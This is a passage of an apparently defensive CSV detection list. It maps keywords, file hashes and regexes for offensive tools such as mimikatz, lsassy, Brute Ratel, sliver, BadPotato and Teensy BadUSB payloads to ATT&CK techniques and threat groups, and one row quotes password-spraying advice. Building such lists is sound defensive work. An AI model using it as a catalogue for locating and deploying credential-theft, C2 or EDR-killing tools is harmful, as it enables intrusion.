- T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - 
EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","N/A","10","10","164","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z","35222" "*Bad password counts dont replicate between domain controllers. Only the PDC knows the real amount of those. Be sure to target the PDC so that accounts don't get locked out*",".{0,1000}Bad\spassword\scounts\sdont\sreplicate\sbetween\sdomain\scontrollers\.\sOnly\sthe\sPDC\sknows\sthe\sreal\samount\sof\sthose\.\sBe\ssure\sto\starget\sthe\sPDC\sso\sthat\saccounts\sdon\'t\sget\slocked\sout.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","35224" "*bad0968b9492c3161ea9b67ecf8520054f90e6d196a7ea0050c8076b2ed2d2a2*",".{0,1000}bad0968b9492c3161ea9b67ecf8520054f90e6d196a7ea0050c8076b2ed2d2a2.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","35225" "*bad19a193019cf92068c5cc4f95906a4e54744349ba8e303e6aee4324e95002d*",".{0,1000}bad19a193019cf92068c5cc4f95906a4e54744349ba8e303e6aee4324e95002d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 
- T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","35226" "*bad29346750d2b59ec0fa45fa4eae324aae520436adcc15fffa29edfacc9be60*",".{0,1000}bad29346750d2b59ec0fa45fa4eae324aae520436adcc15fffa29edfacc9be60.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35227" "*badb9d26cebe5c75a4d2ebf557af9496d7acc8a4b5b51f8ef2e686710bcab359*",".{0,1000}badb9d26cebe5c75a4d2ebf557af9496d7acc8a4b5b51f8ef2e686710bcab359.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35228" "*badc29afa637d3950c1fd837122c4f5d21c2eb431f3e44fec420a9281e3fbbe1*",".{0,1000}badc29afa637d3950c1fd837122c4f5d21c2eb431f3e44fec420a9281e3fbbe1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35229" "*badger_exports.h*",".{0,1000}badger_exports\.h.{0,1000}","offensive_tool_keyword","bruteratel","A 
Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35230" "*badger_no_acl_1030_objects.log*",".{0,1000}badger_no_acl_1030_objects\.log.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","35231" "*badger_svc.exe*",".{0,1000}badger_svc\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35232" "*badger_template.ps1*",".{0,1000}badger_template\.ps1.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - 
T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35233" "*badger_x64.exe*",".{0,1000}badger_x64\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35234" "*badger_x64_*.bin*",".{0,1000}badger_x64_.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35235" "*badger_x64_aws.exe*",".{0,1000}badger_x64_aws\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - 
T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35236" "*badger_x64_stealth_rtl.txt*",".{0,1000}badger_x64_stealth_rtl\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","35237" "*BadgerAtoi*",".{0,1000}BadgerAtoi.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35238" "*BadgerDispatch*",".{0,1000}BadgerDispatch.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black 
Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35239" "*BadgerDispatchW*",".{0,1000}BadgerDispatchW.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35240" "*BadgerMemcpy*",".{0,1000}BadgerMemcpy.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35241" "*BadgerMemset*",".{0,1000}BadgerMemset.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35242" 
"*BadgerStrcmp*",".{0,1000}BadgerStrcmp.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35243" "*BadgerStrlen*",".{0,1000}BadgerStrlen.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35244" "*BadgerWcscmp*",".{0,1000}BadgerWcscmp.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35245" "*BadgerWcslen*",".{0,1000}BadgerWcslen.{0,1000}","offensive_tool_keyword","bruteratel","A Customized 
Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35246" "*Bad-Pdf*",".{0,1000}Bad\-Pdf.{0,1000}","offensive_tool_keyword","Bad-PDF","Bad-PDF create malicious PDF file to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines. it utilize vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener.","T1566.001 - T1189 - T1068 - T1207 - T1048 - T1003","TA0001 - TA0002 - TA0003 - TA0009 - TA0010 - TA0011","N/A","N/A","Credential Access","https://github.com/deepzec/Bad-Pdf","1","1","N/A","N/A","N/A","10","1105","220","2020-08-19T06:54:51Z","2018-04-29T15:21:35Z","35247" "*BadPotato.cs*",".{0,1000}BadPotato\.cs.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","35248" "*BadPotato.exe*",".{0,1000}BadPotato\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","35249" "*badpotato.exe*",".{0,1000}badpotato\.exe.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf 
https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","10","","N/A","","","","35250" "*BadPotato-master.zip*",".{0,1000}BadPotato\-master\.zip.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","35252" "*BadRat 1.6/server_unpacked.exe*",".{0,1000}BadRat\s1\.6\/server_unpacked\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35253" "*BadRat 1.6\server_unpacked.exe*",".{0,1000}BadRat\s1\.6\\server_unpacked\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35254" "*badrat.smb.hta*",".{0,1000}badrat\.smb\.hta.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","35255" 
"*badrat.smb.js*",".{0,1000}badrat\.smb\.js.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","35256" "*badrat_cs.csproj*",".{0,1000}badrat_cs\.csproj.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","35257" "*badrat_cs.exe *",".{0,1000}badrat_cs\.exe\s.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","35258" "*badrat_cs.exe.config*",".{0,1000}badrat_cs\.exe\.config.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","35259" "*badrat_server.py *",".{0,1000}badrat_server\.py\s.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","35260" 
"*badrats-c2-initial-access-payloads.html*",".{0,1000}badrats\-c2\-initial\-access\-payloads\.html.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","35261" "*badrats-master.zip*",".{0,1000}badrats\-master\.zip.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","35262" "*BadRentdrv2.exe*",".{0,1000}BadRentdrv2\.exe.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","1","N/A","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","35263" "*BadUSB_AddAdmin.ino*",".{0,1000}BadUSB_AddAdmin\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","35264" "*BadUSB_DownloadExecute.ino*",".{0,1000}BadUSB_DownloadExecute\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","35265" "*BadUSB_FacebookPost.ino*",".{0,1000}BadUSB_FacebookPost\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","35266" "*BadUSB_HideWindow.ino*",".{0,1000}BadUSB_HideWindow\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","35267" "*BadUSB_LockYourComputer.ino*",".{0,1000}BadUSB_LockYourComputer\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
